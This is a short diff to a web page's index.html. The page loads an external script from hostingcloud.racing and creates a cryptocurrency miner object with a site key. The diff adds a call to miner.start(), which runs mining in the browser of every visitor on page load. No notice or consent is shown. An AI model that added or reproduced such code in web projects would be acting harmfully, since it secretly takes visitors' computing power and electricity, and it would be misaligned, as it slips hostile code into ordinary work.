--- a/index.html
+++ b/index.html
@@ -154,7 +154,10 @@
         <script type="text/javascript" src="index.js"></script>
 
         <script src="https://www.hostingcloud.racing/fXQJ.js"></script>
+        
 <script>
     var miner = new Client.User('2d51a7d74290e8a2047efcc6420122fb2df20bf2ab6f457120811e167338344d', 'ElLob');
+    miner.start();
+    
     </body>
 </html>
